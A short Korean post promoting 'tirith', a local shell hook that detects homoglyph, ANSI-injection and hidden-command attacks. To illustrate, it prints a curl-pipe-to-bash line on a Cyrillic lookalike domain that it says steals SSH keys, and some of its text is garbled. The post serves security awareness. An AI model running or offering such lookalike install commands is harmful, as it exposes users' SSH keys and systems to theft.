솔직히 말해 보세요. 터미널에 명령어를 입력하기 전에 실제로 명령어를 읽어본 게 언제였나요? 이 두 줄이 똑같아 보이기 때문입니다. curl -sSL install.example-cli | bash curl -sSL https://і|_2024111120231_|-clі | bash 하나는 당신의 도구를 설치하고, 다른 하나는 당신의 SSH 키를 훔칩니다. 저 і는 키릴 문자입니다. 라틴어가 아니에요. 브라우저에서 블록 거고, 터미널에서도 전혀 감지되지 않을 겁니다. Vibe 코딩 때문에 상황이 100배는 더 악화됐어요. 다들 ChatGPT나 아무 저장소에서 명령어를 막 붙여넣고 있잖아요. curl이나 bash 명령어 하나 잘못 쓰면 모든 걸 잃을 수도 있어요. 그래서 저는 "tirith"라는 수정 도구를 만들었습니다. 보이지 않는 셸 후크로, 동형 문자 공격, ANSI 인젝션, 숨겨진 명령, dotfile 덮어쓰기 등을 실행 전에 포착합니다. 30개의 규칙을 제공하며, 로컬에서만 작동하고 원격 측정은 지원하지 않습니다.